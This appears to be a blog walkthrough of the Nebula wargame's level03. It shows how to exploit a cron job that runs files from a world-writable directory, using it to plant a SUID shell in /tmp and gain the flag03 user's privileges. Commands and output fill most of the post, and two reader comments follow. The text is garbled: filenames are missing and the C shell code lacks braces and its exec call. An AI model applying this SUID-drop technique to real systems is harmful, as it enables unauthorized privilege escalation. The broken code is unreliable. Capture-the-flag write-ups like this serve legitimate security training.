Wednesday, August 8, 2012

nebula level03

According to the level details in there is a crontab called every couple of minutes (for/as user flag03). Let's check flag03's home directory:
level03@nebula:~$ ls -l /home/flag03
total 8
drwxrwxrwx 2 flag03 flag03 4096 2012-08-08 00:21 writable.d
-rwxr-xr-x 1 flag03 flag03   98 2011-11-20 21:22
writable.d seems to be world-writable (everyone can write to it, just like /tmp). must be the script called by cron. Let's see what it does:
level03@nebula:~$ cat /home/flag03/

for i in /home/flag03/writable.d/* ; do
        (ulimit -t 5; bash -x "$i")
        rm -f "$i"
Apparently executes every executable file residing in writable.d with a 5 second cpu time limit, and then deletes it. We can't do a lot ourselves with a 5 second time limit. We want a shell. So our strategy will be the following:
Make a script to be called by (which is itself called by cron and executed as user flag03) which will drop a SUID shell for us in tmp. Then we'll be free to use the shell in /tmp whenever we need it, for as long as we want.

The shell

For the shell we'll just make a simple C program which calls setresuid and then executes bash:
level03@nebula:~$ cat > /tmp/level03_sh.c
#include <unistd.h>
#include <stdlib.h>

int main()
    int euid = geteuid();
    setresuid(euid, euid, euid);
    return 0;
level03@nebula:~$ make /tmp/level03_sh
cc     /tmp/level03_sh.c   -o /tmp/level03_sh

The script

First we make the script which will drop our shell and put it in writable.d:
level03@nebula:~$ cat > /home/flag03/writable.d/execme
cp /tmp/level03_sh /tmp/flag03_sh
chmod +s /tmp/flag03_sh
level03@nebula:~$ chmod +x /home/flag03/writable.d/execme
Then we wait for it to be called:
level03@nebula:~$ chmod +x /home/flag03/writable.d/execme
level03@nebula:~$ sleep 180; /tmp/flag03_sh
sh-4.2$ id
uid=996(flag03) gid=1004(level03) groups=996(flag03),1004(level03)
In no longer than 3 minutes we have a shell. Now get that flag :D
sh-4.2$ getflag
You have successfully executed getflag on a target account

~ Dmitry


  1. dmitry не могу получить шел описанным способо. суидник полученный из крона по какой-то причине whoami = level03 хотя он -perm -4000 и +x
    сравнил с предыдушими уровнями, там везде у суидника была группа дефолтного юзера (level0x) а тут получается суидник flag03:flag03 мб в этом и трабл?

  2. hm... i receive a permission denied trying to use make